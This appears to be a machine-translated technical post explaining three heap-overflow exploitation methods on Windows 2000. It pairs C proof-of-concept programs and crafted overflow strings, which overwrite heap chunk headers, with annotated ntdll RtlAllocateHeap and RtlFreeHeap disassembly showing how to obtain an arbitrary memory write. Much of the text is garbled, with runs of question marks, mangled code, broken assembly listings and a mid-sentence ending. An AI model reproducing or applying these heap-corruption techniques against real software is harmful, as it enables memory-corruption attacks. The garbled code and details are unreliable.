Transfer from Jiakang
Summarize three utilization methods of windows, which is overflowing 1. RTLallocheap this is ISNO mentioned, see this example main (int Argc, char * argv []) {?? char * buf1, * buf2; ?? char s ] = "Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa / X00 / X00 / X08 / X00 / X11 / X11 / X11 / X21"; ?? buf1 = (char *) malloc (32) ; / * Allocate two memory * / ?? Memcpy (buf1, s, 32 16); / * Here you copy 16 bytes * / ?? buf2 = (char *) malloc (16); ?? free BUF1); ?? Free (buf2);} After the Malloc is completed for BUF1, the returned address (buf1) is a pointer, the pointing memory allocation is such a management structure of BUF1 (8bytes) | BUF1 truly Operating space (32bytes) | The next idle heap The management structure (8bytes) | Two Double List Pointers (8bytes) After completing the malloc to buf2, the memory allocation of BUF1 points to the management structure of BUF1 (8bytes) | BUF1 truly Operable space (32bytes) | BUF2 management structure (8bytes) | BUF2 Real Optional Space (16bytes) | Two Double List Pointer (8bytes) Now if the buf1 Memcpy operation overflows, and overwritten An idle management structure (8bytes) | Two double-linked list pointer (8bytes) a total of 16 bytes, it will cause the buf2 RTLallocheap operation exception. Reason, the code of RTLallocheap 001B: 77FCC453 ?? 8901 ?????????????????????????????????? [ECX], EAX001B: 77FCC455 ?? 894804 ???? ?????????? MOV ?????? [EAX 04], ECX At this time, ECX points to the next pointer (0x21212121) of the two double-linked table pointer (0x21212121), EAX points forward a pointer ( 0x11111111). Similar to format string overflow, you can write any data to any address, this situation is relatively simple, provided before the BUF2 allocation space, BUF1 has overflow opportunities 2. Use RTLFreeHeap to take this is Ilsy mentioned, view example main ( int argc, char * argv []) {?? char * buf1, * buf2; ?? char s [] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa / x03 / x00 / x05 / x00 / x00 / x09"; ?? buf1 = (char *) Malloc (32); / * Assign two memory * / ?? buf2 = (char *) malloc (16); ?? Memcpy (buf1, s, 32 6); / * Here multiple copies 6 bytes * / ??free (buf1); ?? fold (buf2);} Since the buf1 copies 6 bytes, this 6 bytes overwrite the management structure of BUF2, when Free (buf2) An exception occurs.
As long as we carefully construct this 6 bytes, you can take a look at the definition of 8-byte management structure (found from the Windows Source Code) TypeDef struct _heap_entry {???? // ???? // ?? this field Gives The size of the current block in allocation ???? // ?? Granularity Units.?? (ie size << Heap_granularity_shift ???? // ?? Equals the size in bytes). ???? //? ??? // ?? EXCEPT IF this is part of a virtual alloc block dam ?????/ ?? Value is the Difference Between THE commit size in the virtoc entry and the What the user ask for.???///????ushort size; ???? // ????? // this Field Gives The size of the previous block in instocation ???? // Granularity Units (ie prep_granularity_shift ????? // Equals the size of the previous block in bytes). ???? // ???? ushort previoussize; ???? // ????? // this FIELD Contains The Index INTO THE Segment That Controls ???? // The memory for this block.???///?????? s segmentindex; ???? // ???? // this field contaarious Flag Bits Associated with this block.????// Currently There: ???? // ?????/ ?? 0x01 - Heap_ENTRY_BUSY ???? // ?? 0x02 - Heap_ENTRY_EXTRA _Present ???? // ?? 0x04 - Heap_entry_fill_pattern ???? // ?? 0x08 - Heap_entry_virtual_alloc ???? // ?? 0x10 - Heap_entry_last_entry ???? // ?? 0x20 - Heap_entry_settable_flag1 ???? / / ?? 0x40 - HEAP_ENTRY_SETTABLE_FLAG2 ???? // ?? 0x80 - HEAP_ENTRY_SETTABLE_FLAG3 ???? // ???? uchar flags; ???? // ???? // this field contains the number of unused bytes At the end of this ???? // block this week not actual allocated.?? used to compute exact ???? // size required prior to runking requested size to allocation ????? // granularity.??also Used for tail checking purposes.???///???????////-axle (8 bit) tag indexes can go here.???// ?? ?? uchar smalltagindex; #if Defined (_win64) ???? ulonglong reserved1; #ndif} heap_entry, * pheap_entry;
Is this pile of size (2bytes) | SIZE (2BYTES) | index (1byte) | Flag (1byte) | unuse -tes (1byte) | SmallTagIndex (1byte) Note that the size here is the actual size of 8 bytes In addition to 8 values, you can look at the various definitions of Flag and then look at several critical places in RTLFreeheap. One 001b: 77fcc829 ?? 8A4605 ??????????????????? ?? Al, [ESI 05] ?? // ESI points to the start address of the 8-byte management structure of BUF2, Al is FLAG001B: 77FCC82C ?? A801 ??????????????? Test ?????? al, 01 ?????? // flag value containing heap_entry_busy001b: 77fcc82e ?? 0f84a40e0000 ???????? jz ??????? 77fcd6d8 ??? ??? // does not include jump.
Here you can't jump 001b: 77fcc834 ?? F6C207 ??????????????? Test ??????????????? 001b: 77fcc837 ?? 0F859B0E0000 ????? ??? jnz ?????? 77fcd6d8001b: 77fcc83d ?? 807E0440 ???????????? cmp ?????? Byte PTR [ESI 04], 40 ???? // ESI 4 is greater than 0x40001b: 77fcc841 ?? 0f83910e0000 ???????? jae ?????? 77fcd6d8 ?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 001b: 77fcc847 ?? 834DFCFF ????????????????????? DWORD PTR [EBP-04], - 01001B: 77FCC84B ?? a8e0 ???????? ???????? TEST ?????? Al, E0 ???????????? // flag contained whether HEAP_ENTRY_SETTABLE_FLAG1 2 3001B: 77FCC84D ?? 754a ??????? ?????????? jnz ?????? 77fcc899 ??????????????? Jumping as long as it contains one, not important 001b: 77fcc84f ?? 8b8f80050000 ???? ???? MOV ?????? ECX, [EDI 00000580] 001B: 77FCC855 ?? 85c9 ????????????????? Test ?????? ECX, ECX001B : 77fcc857 ?? 7440 ??????????????????? 77fcc899 ???????????? 必 必 必 必 关Points to Item 2001B: 77FCC899 ?? C745FC01000000 ?????? MOV ?????? DWORD PTR [EBP-04], 00000001 ???? 001b: 77fcc8a0 ?? F6C301 ?????????? ???? Test ?????? BL, 01001B: 77FCC8A3 ?? 750f ???????? jnz ?????? 77fcc8b4 ??????? ????? // Here you will hop at 001B: 77FCC8A5 ?? ffb778050000 ???????? push ?????? dword PTR [EDI 00000578] 001B: 77FCC8AB ?? e853c8fbff ?????????? Call ?????? NTDLL! RTLENTERCRITICALSECTION001B: 77FCC8B0 ?? C645D401 ???????????? MOV ?????? byte PTR [ EBP-2C], 01001B: 77FCC8B4 ?? F6460508 ???????????? Test ?????? Byte PTR [ESI 05], 08 ???? // flag contains HEAP_ENTRY_VIRTUAL_ALLOC001B: 77FCC8B8 ?? 0F858BF2FFFFFF ???????? jnz ?????? 77fcbbb49 ????????????? @ 含 则, here you want to jump the key three 001b: 77FCBB49 ?? 83C6E8 ?????????????? add ?????? ESI, -18 ???????????? ilsy said this 0x18 on different Windows versions It is different 001b: 77fcbb4c ?? 89759c ??????????????? MOV ?????? [EBP-64], ESI001B: 77FCBB4F ?? 8B06 ???????? ?????????????? Eax, [ESI] 001B: 77FCBB51 ?? 894598 ?????????????? MOV ?????? [EBP- 68], EAX001B: 77FCBB54 ?? 8b7604 ??????????????? MOV ?????? ESI, [ESI
04] 001B: 77FCBB57 ?? 897594 ?????????????? MOV ?????? [EBP-6C], ESI001B: 77FCBB5A ?? 8906 ????????? ??????? MOV ?????? [ESI], EAX ???????????? // Here we operate an exception We see Eax = 0x61616161, ESI = 0x61616161, it is exactly the value in the buf1, which is the address that the data of the start address of the buf2 minus the address of the 0x18 is replicated to the following data. We can control these two data. It can be seen that there are three premises of the second method: 1) Constructing the Flag of the construction heap (buf2) must contain Heap_Entry_Busy and Heap_Entry_virtual_alloc, which can be set to 0xFF2) Constructors Flag Front of the FLAG front This byte is more than 0x40 small 3) construct a pile of piles (Ie, buf1) must be greater than or equal to 0x18 0x08, 32 bytes, otherwise the ESI will point to the area where we cannot control, resulting in the use of failure and Ilsy to mention the 8-byte construction of byte construction The first byte of the management structure must be greater than 0x80, there is no need to use 0x99 on my machine (Windows2000Pro CN SP4), he uses 0x99, I use 0x03, you can successfully use 3. This is my research The first anomalies of the piles, before, it took 2 hours to read a few posts, and considered that this is an unlocult to occur when the unlink this stack. See Examples main (int argc, char * argv []) {?? char * buf1, * buf2; ?? char s [] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa / x03 / x00 / x05 / x00 / x00 / x00 / x08 / x00 / x11 / x11 / x11 / x11 / x22 "; ?? buf1 = (char *) malloc (32); / * Assign two memory * / ?? buf2 = (char *) Malloc (16); ?? Memcpy (BUF1, S, 32 16); / * Here you copy 16 bytes * / ?? free (buf1); ?? Return 0;} looks very good Impressions, it will be found after running, different from the above mentioned, there is an abnormality when Free (BUF1).
Again, look at the key points of RTLFreeheap, the key points of the second method, try to jump to key two key points II No. 2 001B: 77FCC899 ?? C745FC01000000 ?????? MOV ?????? DWORD PTR [EBP-04], 00000001001B: 77FCC8A0 ?? F6C301 ??????????????? Test ??????, 01001b: 77fcc8a3 ?? 750f ????????? ??????? jnz ?????? 77fcc8b4001b: 77fcc8a5 ?? FFB778050000 ???????? push ?????? dword PTR [EDI 00000578] 001B: 77FCC8AB ?? E853C8FBFF ?? ???????? Call ?????? NTDLL! RTLENTERCRITICATION001B: 77FC8B0 ?? C645D401 ??????????????????? Byte PTR [EBP-2C], 01001B: 77FCC8B4 ?? F6460508 ????????????? Test ?????? Byte PTR [ESI 05], 08 ???? // FLAG contained whether HEAP_ENTRY_VIRTUAL_ALLOC001B: 77FC8B8 ?? 0F858BF2FFFF? ??????? jnz ?????? 77FCBB49 ???????????? // contains jump, here you can't jump 001B: 77FCC8BE ?? 0fb706 ???????? ?????? MOVZX ???? eax, word ptr [ESI] 001b: 77fcc8c1 ?? 8945d0 ?????????????????????????????????????????????? EAX001B: 77FCC8C4 ?? F6470c80 ???????????? Test ?????? Byte PTR [EDI 0C], 80001B: 77FCC8C8 ?? 7515 ?????????? ?????? jnz ?????? 77fcc8df001b: 77fcc8ca ?? 6A00 ???????????????? push ?????? 00001b: 77fcc8cc ?? 8D45D0 ?? ???????????? lea ?????? eax, [EBP-30] 001B: 77FCC8CF ?? 50 ??????????????????? Push ?????? eax 001b: 77fcc8d0 ?? 56 ?????????????????? push ?????? ESI001B: 77FCC8D1 ?? 57 ???????????? ????? push ?????? EDI001B: 77FCC8D2 ?? e8EA000000 ??????????? Call ?????? 77FCC9C1 ???????????? Enter this Call key three 001b: 77fcc9c1 ?? 55 ??????????????????? push ?????? EBP001B: 77FCC9C2 ?? 8bec ??????? ????????? MOV ?????? EBP, ESP001B: 77FCC9C4 ?? 53 ?????????????????? Push ?????? EBX001B : 77fcc9c5 ?? 56 ??????????????????? push ?????? ESI001B: 77FCC9C6 ?? 8b750c ?????????????? MOV ?????? ESI, [EBP 0C] 001B: 77FCC9C9 ?? 8B5D08 ?????????????? MOV ?????? EBX, [EBP 08] 001B: 77fcc9cc ?? 57 ?????????????????? push ?????? EDI001B: 77FCC9CD ?? 8bfe ??????????????? ? MOV ?????? EDI, ESI ???????????? // ESI point to the start address 001b: 77fcc9cf ?? 0fb74602 ?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? Movzx ???? Eax, Word PTR [ESI
02] ???? // put the length of the pile before BUF1 in Eax001b: 77fcc9d3 ?? c1e003 ?????????????? SHL ?????? Eax, 03???? ?????????? // multiply 8 get the actual size 001b: 77fcc9d6 ?? 2BF8 ???????????????? SUB ?????? EDI, EAX? ?????????????? EDI points to the start address 001b: 77fcc9d8 ?? 3bfe ????????????????????? ?? EDI, ESI001B: 77FCC9DA ?? 740a ??????????????????????????? 77fcc9e6001b: 77fcc9dc ?? F6470501 ????????? ??? Test ?????? byte PTR [EDI 05], 01 ???? // Whether the Flag of the last pile contains Heap_ENTRY_BUSY001B: 77FCC9E0 ?? 0F8498E9FFFF ???????? jz ??? ????? 77fcb37e ????????????? // can not jump 001B: 77FCC9E6 ?? F6460510 ???????????? Test ?????? byte PTR [ ESI 05], 10 ???? // Does the FLAG of the last pile containing Heap_entry_last_entry001b: 77fcc9ea ?? 750f ????????????????? jnz ?????? 77fcc9fb? ???????????? // can not jump 001b: 77fcc9ec ?? 8b4510 ???????????????????? Eax, [EBP 10] 001B : 77fcc9ef ?? 8B00 ???????????????????????? Eax, [EAX] ???????????? / BUF1 pile Length 001B: 77FCC9F1 ?? F644C60501 ?????????? Test ?????? Byte PTR [EAX * 8 ESI 05], 01 // BUF2 stack of flags containing Heap_Entry_busy001b: 77FCC9F6 ?? 8d3cc6 ??????????????? lea ?????? EDI, [EAX * 8 ESI] ???????? // EDI points to the start address of BUF2 001b: 77fcc9f9 ?? 7409 ???????????????? jz ???????? 77f CCA04 ????????????? // does not include it (incorporate idle heap? ), Here you want to jump 001B: 77FCC9FB ?? 8bc6 ??????????????????????? Eax, ESI001B: 77FCC9FD ?? 5f ???????? ?????????? pop ?????? EDI001B: 77FCC9FE ?? 5E ???????????????? ESI001B: 77FCC9FF ?? 5B ?????????????????? POP ?????? EBX001B: 77FCCA00 ?? 5D ????????????????????????? ??? POP ?????? EBP001B: 77FCCA01 ?? C21000 ??????????????? RET ????????? 0fb70f ??????? ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 即???????? add ?????? ECX, EAX ???????????? // plus the length of the buf1 pile 001b: 77FCCA09 ?? 81f900fe0000 ????? ??? CMP ?????? ECX, 0000fe00 ???????? // is greater than 0xFE00001B: 77FCCA0F ?? 77ea ???????????????? ja ?? ?????? 77fcc9fb ???????????? // greater than jumping,
